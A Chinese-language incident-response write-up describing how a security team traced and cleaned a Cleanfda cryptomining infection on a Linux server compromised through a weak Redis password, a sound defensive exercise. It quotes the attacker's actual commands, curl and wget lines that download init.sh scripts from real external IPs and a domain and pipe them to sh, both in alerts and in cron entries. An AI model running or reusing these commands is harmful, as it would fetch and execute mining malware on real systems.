蜗牛创想-网安实验室-专题文章

点击查看未关闭靶场

一次Linux服务器入侵排查

发现 1分钟 2个赞

Linux服务器入侵排查

一、事件起因

起因：阿里云的云安全中心进行告警，一台服务器执行了恶意代码。

专题文章

查看恶意脚本代码执行的详情：

专题文章

三条报警信息执行的命令行如下：

curl -fsSL http://45.133.203.192/cleanfda/init.sh | shwget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | shwget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh

由上述阿里云云安全中心报警可知三次报警都是去境外服务器下载恶意脚本并执行，由下载的脚本url可知下载的应该为Cleanfda挖矿木马。执行执行时间为11:20~11.35。

二、排查过程

恶意进程排查：

登录服务器，进行排查。

使用netstat命令查看端口连接情况，netstat -antlp | more。

专题文章

发现大量异常的请求连接，如下。

专题文章

查询IP地址为国外IP。

专题文章

使用top查看系统中各个进程的资源占用状况，显示系统资源消耗并不高。

专题文章

而使用uptime查看系统负载发现负载很高。

专题文章

由此分析恶意进程可能被隐藏了，猜测恶意进程修改了centos 的动态链接库配置文件ld.so.preload内容。查看该配置文件。

a 只能以追加模式编辑，适用于各种日志文件，只有超级用户可以设置或清除该属性

 i   不能进行任何修改，为关键文件加锁，只有超级用户可以设置或清除该属性

专题文章

而后再使用top查看进程，发现有一进程[kswapd0]的cpu使用率极高。

专题文章

使用kill命令尝试杀死该进程，结束该进程后，又会更换一个PID启动。使用ps查看发现该进程的程序文件存放目录为 /var/tmp/.copydie。

专题文章

查看定时任务，确定是否为定时任务启动。

专题文章

发现并不是，而后查看开启自启服务，发现有该进程的服务 kswapd0.service。

systemctl list-unit-files --type=service | grep "enable"

专题文章

查看该服务状态，发现其启动的就是/var/tmp/.copydie下的恶意进程。

专题文章

停止该服务。

专题文章

重新使用top查看，发现还有两个之前写入ld.so.preload的隐藏恶意进程。

专题文章

同理发现其也作为服务启动。而后将服务自启关闭

systemctl disable kswapd0systemctl disable pnscansystemctl disable masscan

而后使用uptime和top查看系统资源使用情况已恢复正常。

专题文章

入侵原因分析：

查看登录日志，比对登录失败与登录成功的账户，确定并不是暴力破解。

登录失败IP

grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr

专题文章

登录成功IP

grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr
分析该台服务器上的部署业务，该台服务器安装了redis、tomcat、mysql等，使用RedisDesk连接redis数据库，发现db0中有四个键值，确定为使用redis写入下载恶意脚本并执行的定时任务。


*/2 * * * * root cd1 -fsSL http://195.58.38.171/cleanfda/init.sh | sh
*/3 * * * * root wget -q -O- http://195.58.38.171/cleanfda/init.sh | sh
*/4 * * * * root curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh
*/5 * * * * root wd1 -q -O- http://45.133.203.192/cleanfda/init.sh | sh



三、后续处理


删除恶意服务

删除/etc/systemd/system下的服务。


删除/etc/systemd/system/default.target.wants/下恶意服务的链接文件。


2.删除恶意程序

删除/var/usr/tmp/.copydie目录及目录下的恶意文件。


查看并删除/tmp目录下的恶意文件。



3.用户账户排查

查看Linux用户，发现用户 hilde。

查看/home目录，发现11:33创建了一个新用户的家目录 hilde 。


查看/etc/passwd文件。



删除用户 hidle

userdel -r hidle
查看/etc/sudoers文件，发现hidle用户拥有sudo权限，修改文件，删除该行。



4.进行相应安全加固

redis 更换强密码，监听固定IP，更改默认端口。



四、总结
本次linux入侵事件，经分析大概率为使用redis未授权漏洞写入定时任务执行下载恶意挖矿程序并执行。而该服务器上的redis口令较弱，导致攻击者利用。由本次入侵事件，可知安全加固必不可少，要注意系统中的薄弱项。